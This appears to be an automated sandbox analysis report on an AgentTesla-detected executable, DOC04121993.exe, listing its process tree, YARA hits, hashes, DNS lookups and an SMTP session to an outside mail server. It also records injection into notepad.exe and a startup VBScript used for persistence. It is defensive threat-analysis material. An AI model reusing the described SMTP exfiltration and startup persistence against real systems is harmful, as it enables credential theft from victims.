English | United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 21, 2020 10:36:42.922708035 CET | 192.168.2.3 | 8.8.8.8 | 0xd70b | Standard query (0) | mail.hybridgroupco.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 21, 2020 10:36:42.969963074 CET | 8.8.8.8 | 192.168.2.3 | 0xd70b | No error (0) | mail.hybridgroupco.com | hybridgroupco.com | | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 10:36:42.969963074 CET | 8.8.8.8 | 192.168.2.3 | 0xd70b | No error (0) | hybridgroupco.com | | 66.70.204.222 | A (IP address) | IN (0x0001)

SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 21, 2020 10:36:43.337428093 CET | 587 | 49731 | 66.70.204.222 | 192.168.2.3 | 220-host.theserver.live ESMTP Exim 4.93 #2 Sat, 21 Nov 2020 13:36:43 +0400
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 21, 2020 10:36:43.338118076 CET | 49731 | 587 | 192.168.2.3 | 66.70.204.222 | EHLO 141700
Nov 21, 2020 10:36:43.441622019 CET | 587 | 49731 | 66.70.204.222 | 192.168.2.3 | 250-host.theserver.live Hello 141700 [84.17.52.25]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-STARTTLS
250 HELP
Nov 21, 2020 10:36:43.442186117 CET | 49731 | 587 | 192.168.2.3 | 66.70.204.222 | STARTTLS
Nov 21, 2020 10:36:43.547034979 CET | 587 | 49731 | 66.70.204.222 | 192.168.2.3 | 220 TLS go ahead

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 10:36:04
Start date: 21/11/2020
Path: C:\Users\user\Desktop\DOC04121993.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\DOC04121993.exe'
Imagebase: 0x400000
File size: 978432 bytes
MD5 hash: 710843B45A8E65C939D3AB4FB96D73E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:36:05
Start date: 21/11/2020
Path: C:\Windows\SysWOW64\notepad.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\notepad.exe
Imagebase: 0xa70000
File size: 236032 bytes
MD5 hash: D693F13FE3AA2010B854C4C60671B8E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:36:05
Start date: 21/11/2020
Path: C:\Users\user\Desktop\DOC04121993.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\DOC04121993.exe'
Imagebase: 0x400000
File size: 978432 bytes
MD5 hash: 710843B45A8E65C939D3AB4FB96D73E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:36:06
Start date: 21/11/2020
Path: C:\Users\user\Desktop\DOC04121993.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
Imagebase: 0x400000
File size: 978432 bytes
MD5 hash: 710843B45A8E65C939D3AB4FB96D73E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

                                                                  General

                                                                  Start time:10:36:15
                                                                  Start date:21/11/2020
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                                                                  Imagebase:0x7ff6149f0000
                                                                  File size:163840 bytes
                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:36:16
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:17
                                                                  Start date:21/11/2020
                                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\notepad.exe
                                                                  Imagebase:0xa70000
                                                                  File size:236032 bytes
                                                                  MD5 hash:D693F13FE3AA2010B854C4C60671B8E2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:36:17
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:18
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis